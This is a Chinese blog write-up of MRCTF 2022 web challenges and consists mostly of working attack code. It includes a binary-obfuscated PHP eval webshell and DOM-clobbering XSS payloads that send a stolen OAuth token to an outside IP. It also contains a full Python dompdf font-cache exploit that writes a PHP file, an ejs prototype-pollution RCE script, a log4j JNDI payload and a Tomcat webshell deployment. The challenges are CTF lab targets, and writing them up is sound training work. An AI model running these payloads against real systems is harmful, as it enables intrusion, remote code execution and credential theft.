[MRCTF 2022]web题目复现

已于 2022-04-27 13:06:55 修改
阅读量1.4k 收藏 4
点赞数 3
分类专栏: 刷题记录 文章标签: php java nodejs
于 2022-04-27 13:05:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/124448615
版权

文章目录

WEB

webcheckin

一个文件上传点,可以上传webshell但是有检测,这里用二进制绕过

<?php
 
class KUYE{
        public $DAXW = null;
        public $LRXV = null;
        function __construct(){
        $this->DAXW = '1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 1001111 1010011 1010100 1011011 1111010 1100101 1110010 1101111 1011101 101001 111011';
        $this->LRXV = @BinToStr($this->DAXW);
        @eval("/*GnSpe=u*/".$this->LRXV."/*GnSpe=u*/");
        }}
new KUYE();
function BinToStr($str){
    $arr = explode(' ', $str);
    foreach($arr as &$v){
        $v = pack("H".strlen(base_convert($v, 2, 16)), base_convert($v, 2, 16));
    }
 
    return join('', $arr);
}
?>

image-20220423144410500

最后flag:

zero=system("find /var -type f | xargs grep 'MRCTF{'");

/var/log/dpkg.log

God_of_GPA

题目由两个web组成:博仁科技统一身份认证和博仁课堂。统一身份认证在登录状态下时,博仁课堂可以直接一键登录。

登录到博仁课堂后可以查看自己的成绩,有一个神秘按钮,点击进入后门界面

这里可是zbr专属的后门通道!想啥呢!

说明需要特殊权限才能使用

再看server端,给了一个和zbr互动的界面(此处提示了bot的浏览器是chrome,跟之后的xss有关)

image-20220426221020647

查看博人树洞的前端代码,发现一段可疑代码

<script>
    let Img =  window.MyImg || {src: 'https://md.buptmerak.cn/uploads/upload_d12a3804a813ffb14fe38a318d6bfcf1.png'}
    let Container = document.createElement("div");
    Container.innerHTML = '<img class="avatar" src="' + Img.src + '">';
    document.body.appendChild(Container);
  </script>

此处可以利用dom xss,参考-使用 Dom Clobbering 扩展 XSS

写两篇xss文章,让bot访问认证页之后重定向到另一篇xss,另一篇xss接到token之后再发送到vps

p1

<a id=MyImg><a id=MyImg name=src href='cid:ibukifalling"οnerrοr="javascript:function getQueryVariable(variable)
        {
               var query = window.location.search.substring(1);
               var vars = query.split(`&`);
               for (var i=0;i<vars.length;i++) {
                       var pair = vars[i].split(`=`);
                       if(pair[0] == variable){return pair[1];}
               }
               return(false);
        }
        var token = getQueryVariable(`token`);
        console.log(token);
        document.write(`<img src=http://yourip/token=`+token+` >`);
        "//'></a>

p2

<a id=MyImg><a id=MyImg name=src href='cid:ibukifalling"οnerrοr="javascript:setTimeout(function(){location.href=`http://brtserver.node3.mrctf.fun/oauth/authorize?redirect_uri=http://brtclient.node3.mrctf.fun/view/part1uuid`},1000)"//'></a>

向bot发送part2的uuid,part2会访问oauth认证地址并且重定向到part1,part1再发送到远程监听服务器上,以此获得token

image-20220426231937613

rFANjznMf279H2WdhX6NEPPWazGPKibk

此时我们本地访问

http://brtclient.node3.mrctf.fun/login?token=rFANjznMf279H2WdhX6NEPPWazGPKibk

查看成绩即可获得flag

image-20220426232201252

当然将两个脚本融合一下变成一个也是可以的

<div id="scrip">
console.log("injected");
let uri = window.location.href + "";
if (uri.indexOf('token') > -1){
    location.href="//106.14.15.50/flag?f="+encodeURIComponent(uri)
}else{
    location.href="http://brtserver.node3.mrctf.fun/oauth/authorize?redirect_uri="+window.location.href
}
</div>
<img src='data:,"οnerrοr="eval(scrip.innerText)' id="MyImg" />

非预期

这里贴一下出题人的wp

非预期1-夺舍bot

由于出题人在写正则的时候忘记写开头和结尾匹配,导致发送uuid的校验出现问题
img

如果向bot发送形如uuid/../../login?token=yourtoken的uuid,可以令bot在博仁课堂端登录上选手本人的账户

而登录成功的页面提示信息是直接拼接用户名的
img

所以可以在用户名处进行xss…直接把payload写在用户名里

因为此时bot在server端仍然是管理员账号,在用户名的xss中令bot先访问brtserver.node3.mrctf.fun/oauth/authorize可以拿回管理员权限,之后就可以打CSRF了

非预期2-oauth xss

这个比上面那个稍微好一点,但依然震撼出题人一整年……并且也有多队打出了这个非预期……

由于跳转界面也是直接拼接的redirect_uri,而redirect_uri后面的路径是可以随便写的,所以可以在redirect_uri处进行xss
img

在文章的xss处令bot访问http://brtserver.node2.buptmerak.cn/oauth/authorize? redirect_uri=http://brtclient.node2.buptmerak.cn/";window.location="http://vps/可以直接拿到token,这样就不用再弹一次了

非预期3-CSRF

非预期1里提到,bot访问/oauth/authorize可以在博仁课堂端管理员登录,那么在文章xss处直接打CSRF也是可以的

Tprint

TP框架,扫一下,有/runtime/log/202204/23.log

发现一个Admin控制器,直接index.php?s=Admin

image-20220426234451999

这里存在一个文件上传的点,根目录有个指定文件名输出pdf的接口

/public/index.php?s=Printer/print&page=/public/storage/static/20220424/8af39fce798b3cd3bf2f7155488f9808.css

主要就是利用dompdf在解析html文件时会默认加载远程css并且进一步缓存远程字体文件的问题。因为未对字体文件后缀进行过滤,导致可以直接缓存任意文件,并且缓存文件名是可以计算出来的。这就导致了一个间接的文件写漏洞。

因为本题不出网,设置了一个文件上传点,通过上传html的方式来进行css注入。我们只需要把恶意字体文件/恶意css/恶意html文件上传上去然后打印我们的恶意文件就能同样触发这个攻击链。

import requests
from hashlib import md5

url = "http://140d90fe-e364-438e-b567-e4c7b3e535e5.node1.mrctf.fun:81"

font_name = "eki"

def print2pdf(page):
    param= {
        "s":"Printer/print",
        "page":page
    }
    res = requests.get(f"{url}/public/index.php",params=param)
    return res

def upload(filename,raw):
    data = {
        "name":"avatar",
        "type":"image",
    }
    res = requests.post(f"{url}/public/index.php?s=admin/upload",data=data,files={"file":(filename,raw,"image/png")})
    return res.json()["result"]

exp_font = "./exp.php"

php_location = upload("exp.php",open(exp_font,"rb").read())

print(f"php_location=>{php_location}")

exp_css = f"""
@font-face{{
    font-family:'{font_name}';
    src:url('http://localhost:81{php_location}');
    font-weight:'normal';
    font-style:'normal';
}}
"""
css_location = upload("exp.css",exp_css)

print(f"css_location=>{css_location}")


html = f"""
<link rel=stylesheet href='http://localhost:81{css_location}'><span style="font-family:{font_name};">5678</span>
"""

html_location = upload("exp.html",html)


payload = "/storage/"
print(f"html_location=>{html_location}")

p = html_location

print(p)

res  = print2pdf(p)

open("out.pdf","wb").write(res.content)

md5helper = md5()

md5helper.update(f"http://localhost:81{php_location}".encode())

remote_path = f"/vendor/dompdf/dompdf/lib/fonts/{font_name}-normal_{md5helper.hexdigest()}.php"

print(f"remote_path=>{remote_path}")

res = requests.get(url+remote_path)

print(res.text)

image-20220427094541603

完整文件我github仓库里有

hurry_up

条件竞争进行原型污染RCE。

(请求A访问/,清除Object上的原型污染,并等待100毫秒) -> (请求B进行原型污染) -> (请求A等待结束,进行ejs模板渲染,原型污染RCE,回显flag)

import requests as requ
import time
import os
requests = requ.Session()
proxies = {}
server = "http://hurry.node2.buptmerak.cn"

def urlencode(sth):
    result = ""
    for i in sth:
        result += "%"
        result += "%02x" % ord(i)
    return result

def add(paths,data):
    url = server + "/hide?a=1"
    for item in paths:
        url += f"&path[]={item}"
    url += "&value="+urlencode(data)
    r = requests.get(url,proxies=proxies)
    return r

def main():
    payload="ee;return process.mainModule.require('child_process').execSync('cat /flag && echo successed').toString();//"
    while 1:
        _ = (add(['__proto__','outputFunctionName'],payload))

if __name__ == '__main__':
    main()

import requests as requ
import time
import os

server = "http://hurry.node2.buptmerak.cn"
requests = requ.Session()

def view():
    return requests.get(server)

def main():
    while 1:
        data = view()
        if 'html' not in data.text:
        #if 'successed' in data.text:
            print(data.text)

main()

image-20220427003904197

BONUS

Java_mem_shell_Basic

进入是一个tomcat

image-20220427120355931

后台弱口令tomcat/tomcat

打包一个冰歇马上传

jar -cvf shell1.war *

冰蝎连接

image-20220427122516992

flag在tomcat首次编译jsp的tomcat/work目录里threatbook_jsp.java

/usr/local/apache-tomcat-8.0.12/work/Catalina/localhost/ROOT/org/apache/jsp/threatbook_jsp.java

image-20220427122704619

Java_mem_shell_Filter

登录框用户名处有log4j

name=${jndi:rmi://xxxxx/exp}&password=admin

jndi反弹shell,没找到flag,将内存dump出来

jmap -dump:format=b,file=e.bin <pid>

生成e.bin后strings就能看到flag

image-20220427125359204

参考:

https://positive.security/blog/dompdf-rce

https://blog.wm-team.cn/index.php/archives/18/

https://ghostasky.github.io/2022/03/19/dompdf%200day(RCE)%E5%A4%8D%E7%8E%B0/

https://mp.weixin.qq.com/s?__biz=MzI3NTg2NTk5Mg==&mid=2247484132&idx=1&sn=55fdb98a839bd2e0a8d14934a0fef757&chksm=eb7f0a03dc0883155a73e1c9326e28be458aa55b7847c5390a43df8702403facb84ab0a06a04&mpshare=1&scene=23&srcid=0425FBJKvWlNewXNv00ett0i&sharer_sharetime=1650892617392&sharer_shareid=ef2a828dd213b828cd3fe897350642f0#rd

https://y4tacker.github.io/2022/04/24/year/2022/4/2022MRCTF-Java%E9%83%A8%E5%88%86/#Java-mem-shell-Basic

Snakin_ya
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
XSSPawn:XSSPawn是一种灵活且可自定义的访客bot,用于设置CTF挑战; 主要用作CTF XSS Bot。 它基于CTFTraining的base_image_xssbot
04-08
XSSPawn XSSPawn是一种灵活且可自定义的访客bot,用于CTF(主要是XSS)挑战设置。 从精湛的分支 建于 高山的 Chrome 木偶核心 Express.js 怎么运行的 XSSPawn是基于触发器的,由Express驱动的服务,它依赖于HTTP请求通信。 为了使XSSPawn访问某个URL,某人需要将带有JSON编码数据的HTTP POST请求(如下所示)发送到/visit端点。 "{"url":"http://<domain>/<some>"}" 收到数据后,XSSPawn将产生Chromium无头浏览器并访问指定的URL。 入门 通常,僵尸程序的访问功能无需任何预先配置即可直接使用。 但是,如果您想编写自己的方案(例如,设置自定义cookie,执行重定向,设置HTTP请求标头),则可以通过提供自己的scenario.js文件
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
100道CTF题目,收好了~(附答案)
m0_61568580的博客
02-28 887
CTF(Capture The Flag),中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。很多朋友对此都非常感兴趣。正好昨天搜集到一份免费分享出来给大家看看~一定要收好了。
有趣的HTML实例(二) 404页面
热门推荐
好好读书
02-06 19万+
有趣的HTML实例(一) 404页面 一款简单的 HTML+CSS 原生 404页面实例 1、HTML 2、CSS 3、舒适的画面感,科技感,代码效果 4、屏幕闪动
LR检查点用法小结(转)
zz的专栏
05-30 4548
LR中检查点有两种:图片和文字。这两种检查点可用以下三个函数实现:web_find()、web_reg_find()和web_image_check() 下面分别介绍三种函数的用法 1.web_find()函数 函数作用:在页面中查找相应的内容 参数举例:web_find("web_find","RighOf=a","LeftOf=b","What=name",LAST); 参数解释:"
干货!一些webshell免杀的技巧
南迪叶先森
07-12 452
0x00:前言 由于杀软的规则在不断更新 所以很多之前的过杀软方法基本上都不行了 而且随着php7逐渐扩张 assert马也将被淘汰 所以本文将提出几种免杀思路 效果很好 而且不会被杀软的正则和沙盒规则约束。 0x01:自定义加密Bypass 部分杀软会直接将一些编码函数如Base64、编码后的关键字或组合函数加入了规则 比如某dir+ 比如这个 都能被检测出是shell 所以为了防止这种的规则 自定义加密显然是最优解 自定义加密可选性多了 只要能把加密后的字符还原回去就行 比如base32 base58
基于Java-web的树洞网站的设计与实现
weixin_love_java_code_的博客
06-19 438
基于Java-web的树洞网站的设计与实现
2022MRCTF-wp
qq_45603443的博客
04-27 616
2022MRCTF-wpWebJust HackingGod_of_GPAWebCheckInJava_mem_shell_BasicJava_mem_shell_FilterMiscpddConnecting...Tip Web Just Hacking 爆出密码foobared redis getshell 在root目录docker config发现账号密码。 登录发现私有镜像 本地运行getflag God_of_GPA 笔记页面有dom xss 认证的地方存在xss 可把token发到其他地
[SCUCTF]2021 校赛 Web题目复现
cosmoslin的博客
04-08 1825
web 1 入门 查看headers 2 shell <?php if(isset($_GET['eval'])){ $eval = $_GET['eval']; if(!preg_match('/[0-9]|[a-z]|\^|\+|\||\$|\[|\]|\{|\}|\&|\-/i', $c)){ eval("$eval"); }else{ die("hacker??"); } }else{ highlight_file(__FILE__); } ?
*CTF2021部分复现
SopRomeo的博客
01-20 1396
web oh-my-note 从源码可以看出session 是经过两次随机进行设置,首先随机取得user_id,在通过user_id和提交的时间取得note_id 看到 view路由 可以发现我们可以通过这个公开页面获得note_id 网页中恰好也给到了admin 的note_id 而我们发现在my_notes 这个路由我们有两种方式看到提交的note 一种session,另一种是GET请求发送user_id 很明显,题目意思要求爆破user_id 创建用户和提交时间可能存在几毫秒的偏差 源码中采
【NepCTF2023】复现
leekos的博客,分享web安全相关知识~
08-16 3685
复现完这题学到了很多关于内网中代理等知识,学到了venom工具构造socks5代理,使用proxifier的方式打开工具,有点像给系统加了一个代理。
最新版树洞 OCR 文字识别工具(免费版)
04-11
树洞是我用过的最方便的文字识别工具,也是市面上最好的免费OCR文字识别,准去率95%以上,没有任何限制,适合于长期办公的人士使用,没有次数限制,准确率还高,下载下来稳赚不亏
强网杯SQL题目复现php.zip
12-17
强网杯 强网杯SQL题目复现php.zip
24年云曦考核web复现(部分)
03-18
24年云曦考核web复现(部分)
php开发工程师系统性教学】——laravel中自动验证的实现教程
php优质创造者
04-13 1719
如果还要错误可以私信博主,这个代码可以实用laravel8以上的版本
Upload-labs(Pass-17--Pass-21)
2301_81105268的博客
04-12 1021
极为艰难的勉强参照着大佬们的博客,将upload靶场上的题目全部做完一遍。尤为感受到,所知俞多,方知所知俞少之感。在文件上传的路上,在web的路上,在ctf的路上,在网络攻防的路上。都还有很长的一段路要走。一段煎熬,困难,波折,孤独的路,但我相信,前行总有曙光。如同此刻的夜晚,偶有残星闪烁,月牙勾起尖角,黑夜笼罩着黑夜。而明天,太阳照常升起。静谧的夜晚,纷乱的思绪。反正也没什么人看见,我为我,写点东西。晚安。2024.4.12。
[CTF]使用浏览器firefox插件伪装IP地址
2301_81475812的博客
04-11 1015
浏览器想必是大家再熟悉不过的东东了,我们会经常使用它访问下载一些页面或文件。比如说一些网站后台会记录我们的IP地址,假如我们处于隐私考虑不希望网站记录真实IP,这时候我们应该怎么办呢?本文主要介绍如何使用firefox的插件伪装IP,希望对需要的同学有所帮助。点击‘选项’打开安装的插件,找到“IP Adress”位置,此处可以输入我们随便写的IP地址,例如 123.123.123.123。此时细心的同学会发现没有‘保存’或‘确定’选项,只需要关闭该插件窗口或重启浏览器即可起作用了。Firefox浏览器。
【无标题】PHP-parse_str变量覆盖
最新发布
asdfaa的博客
04-16 302
变量he值为字符串“Spring”,然后通过parse_str将通过GET方式传递的Moon参数的字符串解析到变量中。由于parse_str存在变量覆盖漏洞,尝试输入?SangFor=he=Moon获得flag。docker-compose.yml文件或者docker tar原始文件。分析代码可知,需要以POST方法传入v1,以GET方法传入v3。访问题目,右键查看源代码,得到提示信息。
CVE-2022-47412复现
07-28
- *1* *2* *3* [Windows CVE-2022-21907和CVE-2022-21970复现以及分析](https://blog.csdn.net/Lab0431/article/details/122942736)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值